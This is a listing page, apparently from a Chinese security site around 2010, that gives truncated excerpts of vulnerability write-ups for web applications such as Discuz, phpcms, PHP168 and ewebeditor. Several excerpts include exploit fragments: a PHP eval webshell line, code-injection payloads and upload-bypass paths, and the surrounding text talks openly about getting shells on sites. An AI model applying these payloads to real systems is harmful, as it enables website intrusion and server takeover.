首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>漏洞资料>列表
Destoon B2B SQL注射 & 后台代码执行
  日期:2010-11-12 14:56:04 点击:403 评论:0
在公布漏洞之前我严重的鄙视下Destoon官方的客服QQ:537074901 我跟她说了你们的系统出漏洞,后果很严重。 一直回我:非商业用户没有任何技术支持,您有问题可以在论坛发帖意思是叫我公开漏洞的意思? SQL注射: 位于搜索页面,使用了urldecode函数,导致两次编码即可绕
Discuz! 7.2以下版本及各uc产品api接口Get webshell漏洞
  日期:2010-11-02 12:02:43 点击:179 评论:0
对于dz,我们比较关心的是拿shell,但dz的东西想拿shell太难太难了,上一篇文章的末尾铺垫了下,所以这篇文章也算不上马后炮了...这个漏洞已经在discuz! x1版本悄悄给补上了,但是7.2及以下含有uc接口的版本的均没有补。 这个漏洞其实也是老漏洞,去年大家就已经知道了
162100网址导航1.9本地文件包含漏洞
  日期:2010-10-28 10:44:55 点击:51 评论:0
破程序破漏洞,但是为了鼓励大家学习,还是发出来了。。。拒绝恶意破坏! 程序官方: http://download.162100.com admin 目录下 run.php 文件部分代码如下: 我找到上传目录 editor/index.html 使用上传图片功能,上传一个1.jpg 内容为 ?php eval($_POST[cmd])? 获得地
Discuz! 7.1 & 7.2 后台远程代码执行漏洞
  日期:2010-10-20 11:24:37 点击:115 评论:0
年初跟那个前台代码执行一起看到的,这个清晰明朗的代码执行,看到的人估计也不少,好在坚持了这么久一直没人公布,这大半年还用了很多次,可是...可是,最终还是有人忍不住要公布,要知道公布一个就少一个,以后的以后,你们靠什么去拿站呢? 这个后台执行也算对当时
Discuz非创始人管理员代码执行
  日期:2010-10-20 11:23:40 点击:124 评论:0
主要是拿到管理员,但并非创始人,利用此EXP可以拿shell。非常简单。 注意:普通会员和版主无效! global.func.php文件中 EXP: 1.进入 admincp.php?frames=yesaction=membersoperation=newsletter 2,发短消息,通知内容为: ${${eval(chr(102).chr(112).chr(117).chr(1
phpcms2008本地文件包括及利用(执行任意SQL脚本)
  日期:2010-10-12 13:10:43 点击:226 评论:0
漏洞详情 简要描述: phpcms2008本地文件包括及利用(执行任意SQL脚本) 详细说明: 文件wap/index.php ?php include '../include/common.inc.php'; include './include/global.func.php'; $lang = include './include/lang.inc.php'; if(preg_match('/(mozilla|m3gate
shopxp html版2.0管理员添加漏洞
  日期:2010-10-11 09:56:16 点击:101 评论:0
程序:shopxp html版2.0,1.0的应该也是一样的存在 漏洞:直接添加管理员 关键字:就是没找到关键字才郁闷 !--#include file=xp.asp-- % dim adminid,action action=request.QueryString(action) adminid=request.QueryString(id) if adminid= then adminid=request(ad
Phpwind 注入以及利用之二:文件上传拿shell
  日期:2010-10-05 11:19:00 点击:479 评论:0
上传漏洞现在很难会出现的,更别说强大的pw了,所以很多朋友是不是认为我这个标题唬人了?不过还确实是上传漏洞,不过呢,这个漏洞的利用需要两个条件,所以说其实很鸡肋,但之前还是蛮好用的,只要满足条件,屡试不爽的。好了,先说条件: 1.必须存在注入,可以注入出
ewebeditor高版本>=5.5鸡肋0day
  日期:2010-10-02 12:36:40 点击:145 评论:0
对6.X的也管用,对ASP。aspx。JSP。均管用。 利用方法: 先访问这个地址 Editor/asp/upload.asp?action=savetype=imagestyle=popupcusdir=a.asp 访问这个地址可以建立个A.ASP的文件夹 再用这个html代码上传。 form action= http://www.xxx.com/Editor/asp/upload.asp?a
无忧购物系统ASP时尚版和通用版上传漏洞利用
  日期:2010-10-01 18:28:42 点击:89 评论:0
关键字:Copyright 2008-2009 gzwynet.com.cn 上传利用地址:admin/upLoad_c.asp?a=uploadfileb=1 利用文件: html head title无忧购物系统ASP时尚版上传漏洞利用程序 BY Qing/title meta http-equiv=Content-Type content=text/html; charset=gb2312 /head form name=
PhpYun人才系统通杀注入及代码执行漏洞
  日期:2010-09-28 10:25:24 点击:246 评论:0
PhpYun人才系统是php业界著名门户网站php100重磅推出的一套开源人才系统,因php100在业界的地位而迅速被站长选用,但毕竟是新生事物,其代码在安全性上存在严重安全问题。 1.宽字节注入 漏洞描述 系统在config/db.safety.php中定义如下代码: function quotesGPC() { $_P
N点虚拟主机管理系统 致命漏洞。通杀所有版本
  日期:2010-09-25 11:07:56 点击:4968 评论:0
这是N致命的漏洞 直接拿服务器权限。因为 直接关系到MYSQL MSSQL SA和ROOT 不过加密方式我还在看他的加密代码。有点迷糊。。。 我看了网上还没有N点虚拟主机管理系统的个方面ODAY之类的发不出来。。等我全部测试完写好就发布。 3057C0DB854C878E72756088058775这是admi
慧博商城系统V6.0注入漏洞
  日期:2010-09-24 12:00:25 点击:78 评论:0
影响版本:慧博商城系统V6.0 漏洞描述:注入漏洞 发布作者:m4r10 http://hi.baidu.com/m4r10 转载请注明版权 漏洞分析:product_inc.asp、checkSQL.asp product_inc.asp: Id = Trim(Request.QueryString(id)) If Id= then Response.Write(script language='javascript'a
万博网站管理系统(NWEB)通杀漏洞
  日期:2010-09-24 11:59:20 点击:824 评论:0
万博网站 管理 系统(NWEB)通杀漏洞 keyword:system/adminlogin.asp EXP:jave的,请安装JAVE环境 package com.sogili.exp; import java.io.*; import java.net.*; public class PostResquest { private String[] key={1,2,3,4,5,6,7,8,9,0,a,b,c,d,e,f,g,h,i,j,k,l,m,n
酷我音乐盒存在DLL劫持漏洞(mfc71chs.dll)
  日期:2010-09-23 13:04:39 点击:87 评论:0
影响系统xp */win 7 用户如果利用酷我音乐盒运行MP3文件既有可能触发dll劫持漏洞 代码: #include windows.h #define DLLIMPORT __declspec (dllexport) int evil() { WinExec(calc, 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason
dede的又一个代码执行
  日期:2010-09-23 13:03:06 点击:76 评论:0
因为鸡肋,所以发出来。 说下利用方法:注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name=']=0;phpinfo();//}x{/dede:toby57},发表后查看或修改即可执行。 生成的解析文件内容如下: 成功效果 这漏洞鸡肋之处在于经历上次的0day冲击后,很多站点已
老Y文章管理系统 v2.5 sp2 SQL注射&Cookies欺骗漏洞
  日期:2010-09-23 13:01:45 点击:570 评论:1
老Y文章管理系统 v2.5 sp2的/user/UserLogin.asp文件存在一个SQL注射漏洞,导致恶意用户可以通过漏洞得到数据库的任何数据。另外后台登陆处理不当,导致通过伪造管理账号密码以及管理员IP即可欺骗登陆后台。 漏洞测试exp: ?php ini_set(max_execution_time,0); error_r
Piwik和OpenX多版本存在PHP远程执行漏洞
  日期:2010-09-19 10:23:10 点击:230 评论:0
本地测试成功 目前官方还没给出补丁 分析代码: ?PHP的 / *这个临时文件,我们将上传的图像文件保存默认路径* / $ default_path ='.. / tmp目录,上传,图像/'; / *检查是否存在$ default_path变量* / 如果(!file_exists($ default_path)) / *如果属实,使具有写
FCKeditor二次上传拿shell
  日期:2010-09-16 10:34:19 点击:1496 评论:0
FCKeditor二次上传拿shell算是FCKeditor漏洞集中比较经典的了,这个二次上传前提条件是要支持aspx而且要求FckEditor/editor/filemanager/connectors/aspx/connector.aspx文件为删除。二次上传漏洞对ASPX站点来说利用比较方便,成功率也比较高,当然若是ASP的站点,支持
PHP168 V6.02整站系统远程执行任意代码漏洞
  日期:2010-09-13 11:29:17 点击:254 评论:1
author:Luc1f3r blog: http://hi.baidu.com/luc1f3r_ EXP: 先注册一个会员,登陆后在地址栏提交: http://URL/member/post.php?only=1showHtml_Type[bencandy][1]={${phpinfo()}}aid=1job=endHTML 可以看到执行了phpinfo(). phpinfo()修改成其他的函数,你懂的
共37页/730条记录 首页 上一页 [10] [11] [12] 13 [14] [15] [16] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  入侵实例
  Exploits
  系统安全
  网络安全
  网络基础
  病毒分析
漏洞资料
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved